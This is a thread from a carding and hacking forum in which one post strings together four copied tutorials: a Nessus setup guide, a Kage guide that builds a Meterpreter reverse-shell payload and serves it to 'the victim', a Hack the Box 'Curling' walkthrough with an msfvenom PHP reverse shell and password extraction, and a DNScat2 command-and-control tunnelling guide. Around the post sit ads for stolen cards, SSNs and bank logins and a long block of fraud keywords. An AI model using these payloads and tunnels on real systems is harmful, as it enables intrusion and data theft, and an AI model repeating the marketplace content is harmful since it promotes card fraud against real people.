Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

Announcement :

For Purchasing Advertising Contact Us | Jabber : [email protected] | Telegram :- @bhcis





PLACE YOUR TEXT HERE FOR ADVERTISE
PLACE YOUR TEXT HERE FOR ADVERTISE
CC+CVV Private Base Wholesale & Retail | 200+ Countries | Rare BINs
Best CC Shop Daily Updates | 200+ Countries | High Quality | 24/7 Fast Support
BlackBet.cc Banks, Shops, Real Docs, SSN+DOB, PayPal, GVoice/Gmail, Lookups











>PLACE TEXT ADVERTISING HERE< &PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE< >PLACE TEXT ADVERTISING HERE<





Announcement : Black Hat Forum is one of the Best Black Hat Carding Forum welcome you. We will share great stuff for our loved members, hope you enjoy your stay on our Black Hat Forum and you will return to us EVERYDAY. Stay Safe Enjoy Blackhat Carding Forum.


  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


[Guide] For Beginner’s to Nessus
#1
0
0
In this article, we will learn about Nessus which is a network vulnerability scanner. There are various network vulnerability scanners but Nessus is one of the best because of its most successful GUI. Therefore, it is widely used in multiple organizations. The tools were developed by Renuad Deraison in the year 1998.
Table of Content
  • Introduction to Nessus
  • Linux Installation
  • Running Vulnerability Scans
  • Windows Installation
Introduction to Nessus
Nessus is a network vulnerability scanner that utilizes the Common Vulnerabilities and Exposures engineering for simple cross-connecting between agreeable security instruments. Nessus utilizes the Nessus Attack Scripting Language (NASL), a basic language that portrays singular dangers and potential assaults. Nessus has a measured design comprising of incorporated servers that direct examining, and remote customers that take into account chairman communication. Executives can incorporate NASL portrayals of every presumed powerlessness to create altered outputs. Noteworthy abilities of Nessus include:
  • Compatible with all OS
  • Scans for vulnerabilities in the local and remote host
  • Informs about missing security in detail
  • Applies various attacks in order to pinpoint a vulnerability
  • It can schedule security audits
  • Runs security tests
Linux Installation
Let’s start the installation on Linux. Here we are installing Nessus on an Ubuntu 18 Machine. Firstly, we will invoke a root shell using sudo bash command. We are going to install Nessus using a deb file that can be downloaded from the

[To see content please register here]

. We traverse to the directory where we have downloaded the deb file. We will change permission to execute the file and then we will install the Nessus.deb file using the
dpkg command.
chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -I Nessus*.deb

1
2

chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -I Nessus*.deb

[Image: 1.png?w=687&ssl=1]
Afterwards, as shown in the image using the following command to run Nessus :
/etc/init.d/nessusd start
1
/etc/init.d/nessusd start

[Image: 2.png?w=687&ssl=1]
This command will open our default browser, which in our case is Mozilla Firefox. And we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. The first click on Advanced followed by Accept the Risk and Continue.
[Image: 3.png?w=687&ssl=1]
Then it will ask you to create an account, as shown in the image, give the details for it.
[Image: 4.png?w=687&ssl=1]
Further, it will ask you for an activation code, provide that just as its shown in the image below :
[Image: 5.png?w=687&ssl=1]
Once all the formalities are done, Nessus will open and will allow you to perform any scan you desire as shown in the image below :
[Image: 6.png?w=687&ssl=1]
Running Vulnerability Scans
When you click on create new scans, there will be multiple scans that you can see in the following image :
[Image: 7.png?w=687&ssl=1]
And then in the policies tab, you can generate different policies on which the scans are based.
[Image: 8.png?w=687&ssl=1]
There are various policies templates too, as shown in the image below :
[Image: 9.png?w=687&ssl=1]
In order to start a new scan, go to scan templates and select a new scan and then give it a name and target IP as shown in the following image :
[Image: 10.png?w=687&ssl=1]
Once the scan is done, it will show you the result; this result will clearly indicate the risk that a vulnerability poses which goes from low to critical.
[Image: 11.png?w=687&ssl=1]
When you click on the vulnerability, for instance here we clicked on the first one which is a critical threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :
[Image: 12.png?w=687&ssl=1]
Now, we clicked on the different one which is a high-level threat, it will give you details about vulnerability such as its severity, whether its RPC or not, its version, etc. as shown in the image below :
[Image: 13.png?w=687&ssl=1]
Windows Installation
Download Nessus for windows from

[To see content please register here]

. And open it similarly in the browser to set it up.

[Image: 14.png?w=687&ssl=1]
Just like in Linux, we will be greeted with a Warning about Certificate Installation. To use Nessus, we will have to get through this warning. First click on Advanced followed by Accept the Risk and Continue.
[Image: 15.png?w=687&ssl=1]
Then it will ask you to create an account, as shown in the image, give the details for it.
[Image: 16.png?w=687&ssl=1]
Further, it will ask you for an activation code, provide that just as its shown in the image below :
[Image: 17.png?w=687&ssl=1]
And then you can start your scans in a similar way just as shown above in Linux.
[Image: 18.png?w=687&ssl=1]

Kage is a GUI for Metasploit RCP servers. It is a good tool for beginners to understand the working of Metasploit as it generates payload and lets you interact with sessions. As this tool is on the process of developing until now it only supports windows/meterpreter and android/meterpreter.  For it to work, you should have Metasploit installed in your system. The only dependency it requires is npm.
Installation
Use the following git command to install the kage software :
git clone //github.com/WayzDev/Kage.git
1
git clone //github.com/WayzDev/Kage.git

[Image: 1.png?w=687]
Go inside the kage folder and install nmp with the following command :
apt-get install npm
1
apt-get install npm

[Image: 2.png?w=687]
Further, use the following command :
npm install
1
npm install

[Image: 3.png?w=687]
And then run it with the following command :
npm run dev
1
npm run dev

[Image: 4.png?w=687]
Once all the perquisites are done, the kage will run. Click on the start server button as shown in the image below :
[Image: 5.png?w=687]
The server will start running. Once all the process is done, click on the close button as shown in the image below :
[Image: 6.png?w=687]
After click on the close button, it will automatically take all the details, and then you can click on the connect button to connect as shown in the image below :
[Image: 7.png?w=687]
Once you are connected, it will show you the following windows :
[Image: 8.png?w=687]
Under the heading payload generator, you can give all the details such as file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9), lport (5252) and then click on generate.
[Image: 9.png?w=687]
After clicking on generate, it will create a new folder named kage (with small k), here, run python server so that you can share your malware with the victim. To run the python server, type :
python -m SimplpeHTTPServer 80
1
python -m SimplpeHTTPServer 80

[Image: 10.png?w=687]
Once the file is shared and executed, it will show the following details under the jobs heading :
[Image: 14.png?w=687]
And when you go the sessions window through the dashboard, you will find a new session that has been created. Click on interact button to access the session.
[Image: 15.png?w=687]
After clicking on the interact button, the following window will open. Here, the first tab will show you all the information about the system.
[Image: 16.png?w=687]
The second tab will show you all the processes that are running on the victim’s PC.
[Image: 17.png?w=687]
And the third tab will give you all the information about its network. Here, you can use three commands through buttons provided and i.e. ifconfig, netstat, route, as shown in the image below :
[Image: 18.png?w=687]

Today we are going to solve another CTF challenge “Curling”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Curling is 10.10.10.150
Penetrating Methodology
  • Network scanning (Nmap)
  • Surfing the IP address on the browser
  • Finding Secret View Page Source
  • Decoding Secret
  • Enumerating Joomla!
  • Creating Payload using msfvenom
  • Getting Meterpreter Session
  • Enumerate and Extract password files
  • Getting SSH Session
  • Grab User Flag
  • Enumerate for Root Flag
  • Getting the root flag
Walkthrough
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV -sC -T4 -p- 10.10.10.150
1
nmap -sV -sC -T4 -p- 10.10.10.150

[Image: 1.png?w=687]
The Nmap scan shows 2 open ports: 22(SSH), 80(HTTP)
As port 80 is running HTTP service, we open the IP address in the web browser.
[Image: 2.png?w=687]
Here, we found two usernames Floris & Super User. They might come in handy later on. Let’s view the Page source of the webpage.
[Image: 3.png?w=687]
Let’s open the secret.txt in the browser.  It displayed a base64 encoded string.
[Image: 4.png?w=687]
Time to decode this base64 encoded string. So, on decoding it we got Curling2018! This can be used as a credential.
echo "Q3VybGluZzIwMTgh" | base64 -d
1
echo "Q3VybGluZzIwMTgh" | base64 -d

[Image: 5.png?w=687]
Due to previous experience with Joomla! We already knew about its administrator login page. Not wasting our time we directly opened /administrator directory in the browser along with the credentials.
Username- Floris
Password- Curling2018!
[Image: 6.png?w=687]
We have successfully logged in.
[Image: 7.png?w=687]
We have created a PHP shell payload using msfvenom.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.120 lport=443 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.120 lport=443 -f raw

[Image: 8.png?w=687]
On the other hand, we have setup listening using Metasploit-framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

1
2
3
4
5

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 443
msf exploit(multi/handler) > run

[Image: 9.png?w=687]
Let’s try to upload php reverse shell script which we have created using msfvenom. Let’s first navigate to /template/protostar/ on the webpage.
[Image: 10.png?w=687]
Finally, we have got the meterpreter.
[Image: 11.png?w=687]
We got the reverse shell, but it is not a proper shell. We will spawn a tty shell using python.
shell
python3 -c "import pty;pty.spawn('/bin/bash')"

1
2

shell
python3 -c "import pty;pty.spawn('/bin/bash')"

[Image: 12.png?w=687]
After enumerating through directories, we found a useful file password_backup. Let’s check its contents. The contents of this file look like hexdump.
ls -al
cat password_backup

1
2

ls -al
cat password_backup

[Image: 13.png?w=687]
Let’s use an xxd tool which is used to create hex dump of the given file or standard input. On decompressing the file we saw the author of the machine has recursively compressed the password_backup file. We need to recursively decompress it.
xxd -r password_backup > password
file password
mv password password.bz2
bzip2 -d password.bz2
ls
file password
mv password password.gz
gzip -d password.gz
ls
file password
mv password password.bz2
bzip2 -d password bz2
ls
mv password password.tar
tar xvf password.tar
cat password.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

xxd -r password_backup > password
file password
mv password password.bz2
bzip2 -d password.bz2
ls
file password
mv password password.gz
gzip -d password.gz
ls
file password
mv password password.bz2
bzip2 -d password bz2
ls
mv password password.tar
tar xvf password.tar
cat password.txt

The content found in password.txt might be the password to login into SSH. Let’s find out if our intuition is true or not.
[Image: 14.png?w=687]
We have successfully logged into SSH using the password found in password.txt.
ssh [email protected]
1
ssh [email protected]

On exploring, we found User.txt and read its contents.
ls
cat user.txt

1
2

ls
cat user.txt

[Image: 16.png?w=687]
On further enumerating, we found two files input & report in the admin-area folder. Let’s read the contents of both the files.
cat input
wc -l report

1
2

cat input
wc -l report

[Image: 17.png?w=687]
After sometime of thinking, we thought of changing the content of the input file using echo.
ls -al
echo "file:///root/root.txt" > input

1
2

ls -al
echo "file:///root/root.txt" > input

[Image: 18.png?w=687]
It took us time to think about it. We did this because we knew our final flag is inside /root/root/txt. And also came to know the output of the input file will be saved in the report file.
Now after some time when we opened the report file. We found our Final Flag and read its contents.
wc -l report
cat report

1
2

wc -l report
cat report

[Image: 19.png?w=687]

In this article, we learn DNS tunneling through an amazing tool i.e. DNScat2
Table of Content :
  • Introduction to DNS
  • Introduction to DNScat
  • Installation
  • DNS tunneling
  • Conclusion
Introduction to DNS
The Domain Name System (DNS) associate’s URLs with their IP address. With DNS, it’s conceivable to type words rather than a series of numbers into a browser, enabling individuals to look for sites and send messages utilizing commonplace names. When you look for the domain name in a browser, it sends a question over to the DNS server to coordinate the domain with its IP. When found, it utilizes the IP to recover the site’s content. Most astonishingly, this entire procedure takes just milliseconds. For all this working, it uses port 53.
Introduction to DNScat
DNScat is such praised tool because it can create a command and control tunnel over the DNS protocol which lets an attacker work in stealth mode. You can access any data along with uploading and downloading files and to get a shell. For this tool to work over 53 port, you don’t need to have authoritative access to DNS server, you can just simply establish your connection over port 53 and it will be faster and it will still be sensed as usual traffic. But it makes its presence well known in the packet log.
DNScat is made of two components i.e. a server and a client. To know the working of dnscat, it is important to understand both of these components.
The client is intended to be kept running on a target machine. It’s written in C and has the least amount of the prerequisites. When you run the client, you regularly indicate a domain name. All packets will be sent to the local DNS server, which is then directed to the legitimate DNS server for that domain (which you, apparently, have control of).
The server is intended to be kept running on a definitive DNS server. It’s developed in ruby and relies upon a few distinct gems. When you run it, much like the client, you indicate from which domain(s) it listens to over 53. When it gets traffic for one of those domains, it endeavours to set up a legitimate association. It gets other traffic it will automatically disregard it but, however, it can also advance it upstream.
Installation
Run the following git command to download dnscat2 :
git clone //github.com/iagox86/dnscat2.git
1
git clone //github.com/iagox86/dnscat2.git

[Image: 1.png?w=687]
Now install bundler as it is a major dependency for dnscat2. To install bundler go into the server of dnscat2 and type :
gem install bundler
bundle install

1
2

gem install bundler
bundle install

[Image: 2.png?w=687]
Once everything is done, the server will run with the following command :
ruby dnscat2.rb
1
ruby dnscat2.rb

[Image: 3.png?w=687]
Similarly, download dnscat2 in the client machine too.  And use make command to compile it with the server, as shown in the image below :
[Image: 4.png?w=687]
To establish a connection between client and server, use the following command :
./dnscat2 --dns-server=192.168.174.131,port=53
1
./dnscat2 --dns-server=192.168.174.131,port=53

[Image: 5.png?w=687]
Once the connection is established, you can see on the server side that you will have a session as shown in the image below. You can use the command ‘sessions’ to check for a session that is created.
[Image: 6.png?w=687]
To interact with the said session type the following command :
session -i 1
1
session -i 1

As you can access the session now, use the word ‘ping’ to ping the target and if it replies ‘Pong!’ then you ping is successful.
[Image: 7.png?w=687]
Following will be the response on the client side of the ping command.
[Image: 8.png?w=687]
Further will the help command you can see all the options that we can use to our advantage. If you want to go to the shell then just type ‘shell’ and it will open a new window with the session to interact with the shell of the target system.
[Image: 9.png?w=687]
To interact with the shell session that is opened in a new terminal, type following set of commands :
windows
session -i 2

1
2

windows
session -i 2

[Image: 10.png?w=687]
Once you are in the session, you can execute any shell command like ‘uname -a’ as shown in the image above.
DNS Tunnelling
DNS tunnelling is the best attack through DNScat2. If through ifconfig you find two networks in your target system, as shown in the image below, you can easily perform DNS tunnelling.
[Image: 11.png?w=687]
For DNS tunnelling, type the following command :
listen 127.0.0.1:888 10.0.0.10:22
1
listen 127.0.0.1:888 10.0.0.10:22

[Image: 12.png?w=687]
Now you can try and connect to the SSH port with the following command :
ssh [email protected] -p 888
1
ssh [email protected] -p 888

Then, once connected, you can use ‘ifconfig’ command to see the network you have tunnelled for as shown in the following image :
[Image: 13.png?w=687]
As you have SSH control of the second network too, you can download DNScat2 in the said network too, in order to attack that network as well. Once you have downloaded DNScat2 in that network, type the following command to run it and have your session on the DNScat2 server :
dnscat2.exe --dns=server=192.168.174.131,port=53
1
dnscat2.exe --dns=server=192.168.174.131,port=53

[Image: 14.png?w=687]
Once the above command is executed, you will have a new session that you can access with the following set of commands :
sessions
session -i 2

1
2

sessions
session -i 2

And once you have access to the session, you can run any command.
[Image: 15.png?w=687]
And when further you use the systeminfo command, it will show you the details of the second system that you have gotten the access of through tunnelling.
[Image: 16.png?w=687]
Conclusion

Even in the most confined situations, DNS traffic ought to be permitted to determine inner or outside network. This can be utilized as a correspondence channel between an objective host and the command and control server. Command and information are contained inside DNS inquiries and identification that is why detection is troublesome since arbitrary command hides in plain sight due it being perceived as legitimate traffic. And this is exactly what DNSCat takes advantage of, making it a successful tool to attack.
Reply





Messages In This Thread
[Guide] For Beginner’s to Nessus - by NINZA - 05-14-2020, 12:00 PM



Users browsing this thread:
1 Guest(s)

 


Blackhat Carding forum



Search keywords: the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs,carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, WebMoney carding, card clone, the best hacking country, india hackers team, alboraaq , pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, x'xx passwords, WebMoney hacking, abh cc live, fresh smtp, hacking forum scam free smtp, wmz carding , spam paypal, caring, true carders, carding board, what is the best hacking forum, www.hackingforum.ru, www.carderscave.ru, www.darkgeo.com, www.darkgeo.su, www.darkgeo.ru, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer only for real hackers, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com. Carding forum, Carders Forum, Hacking Forum, Hackers Forum, Cheap WU Transfer, CCV Dumps, Legit Carders 2020, ATN Team, Altenen, Hacking Tutorials, Free Premium Porn Accounts, Carding Tools 2020, Fraud Carding, Fraudsters Marketplace, Carding Forum Scam, Inbox Spamming, Free Mailer PHP, Free VPN 2020, Best VPN 2020, AlphaBay Market, Free Fresh Mail Leads, Real Hacker Forum, Alboraaq Review, Alboraaq Hackers, Perfect Money Stealer, Darknet Forums, Darknet Hackers, Darknet Carders, Cardable Websites 2020, Buy Credit Card Dumps, Western Union Generator, Money Gram Transfers Cheap, Free CVV, Free RDP, Cheap RDP, Amazon Carding 2020, NonVBV Cardable Websites, TOR VPN 2020, Russian Carding Forum, UK Carding Forums, Bitcoin Wallet Stealer, Bitcoin Carding, Bank Stealer, Hacked Bank Logins, Bank Logins, Free Keyloggers 2020, Best Keylogger Download, Free Receipt Generator, Card Bitcoins easy, Amazon method, Best Pakistan Carders, Dumps Section, Legit Carding, Unseen, Tutamail, Deepdotweb, CC Live, Free premium logs, iPhone 6s Carded, Cheap Electronics Carding, Black Marketplace, Cheap Bank Transfers, Carding Tools, Havij Hacking, India Hackers, Cheap Apple Carding 2020, PayPal Dumps Logs, Market Hackers, Fresh email logs, btc carding, amex cc, havij carding tutorial, shop credit card, visa cc, cheap shipping, alboraaq, underground forum, botnet, hacking programs, bitshacking, truehackers, cc stealer, how to get credit cards, dumps, pin, logs, email logs, hacking tools, hacking programs, carding tools, ccv checker, ccv balance checker, carding tutorials, mg transfer, wu transf, bank transfer, card clone, hacking stuff, card clone, the best hacking country, india hackers team, alboraaq scamming, pakistan hackers, wu transfer to nigeria, wu bug, wu transfer, iPhone carding shipping, hacking and carding forum, carding stuff, porn accounts, xxx passwords, xxx username and passwords, abh cc live, fresh smtp, hacking forum scam free smtp, ams spamming, spam paypal, caring, true carders, carding board, what is the best hacking forum, the best hacking forum, freedom to palestine, indian hackers team, spaming tools, ams fresh spaming, inbox spaming, the best carding forum, credit card dumps, free credit cards, carding forum, carders forum, wu transfer, western union transfer, hacked ccv, cc dumps, legit carders, altenen hackers, hacking tutorials, free porn acconts, paypal dumps, bank account login, alboraaq hackers, cheap apple items carded, market hackers, fraud market, perfectmoney stealer, platinum card, database dump, atn, how to card btc, free paypal logs, altenen, how to card bitcoins, bitcoin carding, fresh leads, proxy list, bitcoin wallet stealer, how to hack a bitcoin wallet, perfect money adder, hacking forum rip, carding board, western union transfer, carding 2020, carders 2020, carders forum 2020, carding forum 2020, hacking forum 2020, fraud market 2020, carding tutorials 2020, carding forum 2020, carders forum 2020, carding tutorials 2020, carders 2020, hackers forum 2020, hacking forum 2020, fraud market 2020, hacked wu 2020, carded iphone 2020, cardingf.com, altenen, altenen.com, alboraaq, alboraaq.com